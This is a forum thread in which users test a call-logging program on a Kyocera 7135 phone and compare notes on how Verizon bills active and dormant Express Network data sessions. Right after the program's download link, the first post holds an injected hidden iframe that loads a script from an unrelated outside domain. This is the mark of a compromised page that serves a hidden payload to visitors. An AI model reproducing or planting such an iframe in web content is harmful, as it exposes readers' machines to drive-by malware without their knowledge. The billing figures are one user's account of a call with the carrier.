+ Reply to Thread

7135 Test #2: Data Capture attempt 1

OK, all you brave tester-type folks. The program below is a test to see if packet data calls trigger any sort of response in the signals API. I rather doubt that they do, but I want to verify the theory. Just load and run it, and the screen prompts should be self explanatory.

Note that this ONLY applies to Express network customers. It would be ideal if one person with PER MINUTE and one person with PER KB billing could try it.

If this produces anything, please PM me the contents of the memo record. If, as I suspect, nothing happens, I have another trick to try later that no doubt will produce something.

Be sure you deactivate this after the test, as it will make a Memo record of EVERY call if you don't!

Thanks again!

http://home.triad.rr.com/rlwhitt/pal.../DumpCalls.prc<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Well I already did the test and I sent a PM with my data. It did see the connection and the amount of time of the calls. Only disturbing thing that I noticed was that the Data Fwd & Rec Rate speed that was reported at least in the memo file was 9600 kbps. I'm curious if true and it is the speed of the actual connection, why is it so slow ??? I thought the EN network was supposed to be around 40-60k ??

By the way on that note, does anyone have a tool or any way of really knowing how fast the connection really is ? Either on the phone (preferred) or on a laptop. I have used those internet speed checks in the past with my cable and DSL connections but haven't tried to use the phone as my connection for my laptop to do the same tests.

Thanks to Baback for the data - it does indeed seem to signal the packet data calls. I suspect at this point that it will do this even if you are on a per Kb plan, but anyone else that wants to try this test and confirm the results is most appreciated.

I just tried it with the per kb plan and found the memo with the connection, but it doesn't seem to be showing the amount of data sent. I will pm it to you. It does show only a 9600 kbps rate.

I did not expect it to show data sent - there is nothing in the call summary struture that the phone sends at the end of the call that would indicate that, so that will have to be found another way.

You guys that are testing this might try one more thing. Sometime when you get a chance, it would be interesting to see what happens when the packet connection goes dormant and then reactivated, rather than disconnecting it and then connecting a new one. I'd like to see if only one big record gets created, or if the "end of call" signal comes when it goes dormant. Thanks!

I'm pretty certain that VZ will only bill for the active period, and it would be nice to know that these signals are coming at the right time.

I just ran the test with the per kb plan where I let the connection go dormant and then reactivated it, let it go dormant again and and then reactivated it again. It looks to my untrained eye that it just recorded each as a separate memo and a separate connection. I will pm you the details. Does this mean that it is reconnecting with the EN each time?

It's not really reconnecting, just starting a new "active" period. It only has to reconnect if it goes from dormant or active all the way to inactive.

I have a request for anyone reading this that is billed EN data by the minute. Run this test like lnoble just did, letting it record a few "sessions" coming from dormancy to active status. Then if you can somehow verify online or with the billing people at VZ that they are indeed seeing the same discreet active periods and that this is what you will actually be billed for (not the dormant periods as I suspect). Also, will these minutes be rounded up like voice ones? (Again, I suspect yes).

Positive verification of the above suspicions will yield enough data that I can confidently say Minutes PLUS will be able to accurately track EN data minutes.

Now for the tough one - Kb tracking.

Originally posted by lnoble
    Does this mean that it is reconnecting with the EN each time?

Originally posted by rlwhitt
    It's not really reconnecting, just starting a new "active" period. It only has to reconnect if it goes from dormant or active all the way to inactive.

I have a request for anyone reading this that is billed EN data by the minute. Run this test like lnoble just did, letting it record a few "sessions" coming from dormancy to active status. Then if you can somehow verify online or with the billing people at VZ that they are indeed seeing the same discreet active periods and that this is what you will actually be billed for (not the dormant periods as I suspect). Also, will these minutes be rounded up like voice ones? (Again, I suspect yes).

Positive verification of the above suspicions will yield enough data that I can confidently say Minutes PLUS will be able to accurately track EN data minutes.

Now for the tough one - Kb tracking.
    Ok, here is the run down. First of all Verizon could NOT verify my actual usage from yesterday. In regards to the memos, when the phone is in ACTIVE mode, it is being recoreded as such. Once in dormant and back from dormant mode to active mode, there is a NEW memo created and logged.

After talking to Verizon C.S. and E.N. division they gave me some bad news....

Ok here I go... By the way, the only way to verify this is at the next billing period when I get my bill...

I am in Active mode for 1:10 and then I go into Dormant mode for :45 and then back to Active mode for :30 and then I HARD disconnect.

The above example is billed like this:

Active 1:10 = 2min. billed
    Dormant :45 = 1min. billed
    Active mode :30 = 1min. billed

Now here is the next example:

I am in Active mode for 1:10 and then I go into Dormant mode for 1:45 and then back to Active mode for :30 and then I HARD disconnect.

Dormant 1:45 = 1min. billed

There is a FIRST 1 min. dormant mode billing that is automaticly charged but after that it is no longer charged. Also when you are in dormant mode for longer than 5 min. the phone completly drops out of dormant mode and goes into standard standby phone mode with no EN connection.

So if you were active for 1:50 and dormant for :50 and then active for 2:05 then you will be basically billed for the entire duration!! ( 6 min!!)

Well untill there is a new version of Minutes I think I will keep my TEST program active and log all my EN connections and try to match it to my bill when it comes in. God help me on trying to figure that out !!!

Well that certainly makes a mess of everything.

And might I add this is a massive RIP OFF. Charging you for when you are not transmitting data is pretty low class of Verizon.

Originally posted by babacksh
    Ok, here is the run down. First of all Verizon could NOT verify my actual usage from yesterday. In regards to the memos, when the phone is in ACTIVE mode, it is being recoreded as such. Once in dormant and back from dormant mode to active mode, there is a NEW memo created and logged.

After talking to Verizon C.S. and E.N. division they gave me some bad news....

Ok here I go... By the way, the only way to verify this is at the next billing period when I get my bill...

I am in Active mode for 1:10 and then I go into Dormant mode for :45 and then back to Active mode for :30 and then I HARD disconnect.

Dormant :45 = 1min. billed

Now here is the next example:

I am in Active mode for 1:10 and then I go into Dormant mode for 1:45 and then back to Active mode for :30 and then I HARD disconnect.

Dormant 1:45 = 1min. billed

There is a FIRST 1 min. dormant mode billing that is automaticly charged but after that it is no longer charged. Also when you are in dormant mode for longer than 5 min. the phone completly drops out of dormant mode and goes into standard standby phone mode with no EN connection.

So if you were active for 1:50 and dormant for :50 and then active for 2:05 then you will be basically billed for the entire duration!! ( 6 min!!)

Well untill there is a new version of Minutes I think I will keep my TEST program active and log all my EN connections and try to match it to my bill when it comes in. God help me on trying to figure that out !!!

I told them the same thing!! I told them when my phone goes into dormant mode and my bandwidth is being alocated to someone else, why am I still being charged for it !! they just said that because you still have a connection and are still taking up "some" bandwidth but not the full.... I guess the reall answer to that will be when I get my bill in 2 weeks from now!!